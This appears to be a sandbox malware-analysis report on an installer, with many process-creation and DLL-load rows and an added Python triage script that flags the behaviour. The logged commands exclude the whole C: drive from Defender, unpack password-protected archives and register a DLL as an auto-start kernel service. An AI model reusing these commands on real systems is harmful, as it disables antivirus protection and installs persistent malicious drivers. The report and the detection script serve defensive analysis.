Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$402A0,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
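The process rows above describe one chain: the Inno Setup stub (the `.tmp` launched with `/SL5=`) runs `powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"`, which excludes the whole system drive from Defender scanning, then re-runs the installer with `/VERYSILENT`; the second stub drops `7zr.exe` into `C:\Program Files (x86)\Windows NT`, extracts two password-protected archives with the passwords on the command line, registers `tProtect.dll` as a kernel-mode service named `CleverSoar` (`sc create ... type= kernel start= auto`), and then `sc start CleverSoar` is issued over and over. The following triage script is an added example, not Joe Sandbox code: it parses rows in this report's `Source: ... Process created: ...` format and applies those four observations as rules. The rule names, severities and the start-retry threshold are this example's own choices, and the sample rows are a constructed subset of the report with the installer's name shortened to `setup_2.0.4`.

```python
"""Triage rules over "Process created" rows from a sandbox report.

Added example (not Joe Sandbox code). Rule names, thresholds and the
sample rows below are this example's own constructions.
"""
import re
from collections import Counter
from typing import List, NamedTuple, Optional


class Event(NamedTuple):
    source: str    # parent process as reported
    image: str     # created image path
    cmdline: str   # command line handed to the child


class Finding(NamedTuple):
    rule: str
    severity: str
    detail: str


# Constructed sample: a subset of the rows from the report above, with the
# installer's name shortened. One row keeps the "Jump to behavior" link
# residue on purpose, to show the parser tolerates it.
SAMPLE_REPORT = r"""
Source: C:\Users\user\Desktop\setup_2.0.4.exe  Process created: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\setup_2.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\setup_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\setup_2.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\setup_2.0.4.tmp  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\setup_2.0.4.tmp  Process created: C:\Users\user\Desktop\setup_2.0.4.exe "C:\Users\user\Desktop\setup_2.0.4.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\setup_2.0.4.tmp  Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\setup_2.0.4.tmp  Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe  Process created: unknown unknown
"""

# Tolerates both "Source: XProcess created:" (run together) and "Source: X  Process created:",
# and drops a trailing "Jump to behavior" / "Jump to dropped file" link text.
ROW_RE = re.compile(r"^Source:\s*(.*?)\s*Process created:\s*(.*?)\s*(?:Jump to (?:behavior|dropped file))?$")
# The image path may contain spaces ("C:\Program Files (x86)\..."), so split at the first ".exe"/".tmp" token.
IMAGE_RE = re.compile(r"^(.*?\.(?:exe|tmp))\s+(.*)$", re.IGNORECASE)
DRIVE_ROOT_RE = re.compile(r"^[A-Za-z]:\\?$")
DRIVER_DIR = "c:\\windows\\system32\\drivers\\"


def parse_row(line: str) -> Optional[Event]:
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    source, rest = m.group(1), m.group(2)
    im = IMAGE_RE.match(rest)
    if im:
        return Event(source, im.group(1), im.group(2))
    parts = rest.split(None, 1)              # e.g. "unknown unknown"
    if not parts:
        return None
    return Event(source, parts[0], parts[1] if len(parts) > 1 else "")


def parse_report(text: str) -> List[Event]:
    return [ev for ev in (parse_row(line) for line in text.splitlines()) if ev]


def rule_defender_exclusion(ev: Event) -> Optional[Finding]:
    if "add-mppreference" not in ev.cmdline.lower():
        return None
    m = re.search(r"-ExclusionPath\s+'([^']*)'", ev.cmdline, re.IGNORECASE)
    path = m.group(1) if m else ev.cmdline
    if DRIVE_ROOT_RE.match(path):
        return Finding("defender_exclusion", "high", f"Add-MpPreference excludes the whole drive {path} from Defender scanning")
    return Finding("defender_exclusion", "medium", f"Add-MpPreference adds exclusion {path}")


def rule_silent_relaunch(ev: Event) -> Optional[Finding]:
    if "/verysilent" in ev.cmdline.lower() and ev.source.lower().endswith(".tmp"):
        return Finding("silent_relaunch", "low", f"{ev.source} re-runs {ev.image} with /VERYSILENT")
    return None


def rule_archive_with_password(ev: Event) -> Optional[Finding]:
    if not re.match(r"7zr?\.exe\s+x\b", ev.cmdline, re.IGNORECASE):
        return None
    m = re.search(r"\s(\S+)\s+-p(\S+)", ev.cmdline)
    if not m:
        return None
    archive, pw = m.group(1), m.group(2)
    return Finding("archive_extraction", "medium",
                   f"{ev.image} extracts {archive} with password {pw!r} on the command line")


def rule_kernel_service(ev: Event) -> Optional[Finding]:
    m = re.match(r"sc\s+create\s+(\S+)", ev.cmdline, re.IGNORECASE)
    if not m:
        return None
    typ = re.search(r"type=\s*(\S+)", ev.cmdline, re.IGNORECASE)
    if not typ or typ.group(1).lower() not in ("kernel", "filesys"):
        return None
    binm = re.search(r'binPath=\s*"([^"]+)"|binPath=\s*(\S+)', ev.cmdline, re.IGNORECASE)
    binpath = (binm.group(1) or binm.group(2)) if binm else ""
    reasons = []
    if not binpath.lower().endswith(".sys"):
        reasons.append("image extension is not .sys")
    if not binpath.lower().startswith(DRIVER_DIR):
        reasons.append("image lives outside System32\\drivers")
    if not reasons:
        return None
    return Finding("kernel_driver_service", "high",
                   f"service {m.group(1)} registered as type={typ.group(1)} with binPath {binpath!r}: {'; '.join(reasons)}")


def rule_service_start_loop(events: List[Event], threshold: int = 3) -> List[Finding]:
    starts = Counter(
        " ".join(ev.cmdline.split())
        for ev in events
        if ev.image.lower().endswith("\\sc.exe") and re.match(r"sc\s+start\s+\S+", ev.cmdline, re.IGNORECASE)
    )
    return [Finding("service_start_loop", "medium", f"{cmd!r} issued {n} times")
            for cmd, n in starts.items() if n >= threshold]


PER_EVENT_RULES = (rule_defender_exclusion, rule_silent_relaunch, rule_archive_with_password, rule_kernel_service)


def triage(report_text: str) -> List[Finding]:
    events = parse_report(report_text)
    findings = [f for ev in events for rule in PER_EVENT_RULES if (f := rule(ev))]
    findings.extend(rule_service_start_loop(events))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_REPORT):
        print(f"[{f.severity:6}] {f.rule}: {f.detail}")
```

The archive rule records the `-p` password because the report leaves it in the command line, which means the dropped `res.dat` and `locale3.dat` can be unpacked offline for static analysis. On a live EDR feed the same rules would key on parent/child process objects rather than text rows; the text parser here exists only because the sandbox report is what this page provides.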
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp  Section loaded: textinputframework.dll
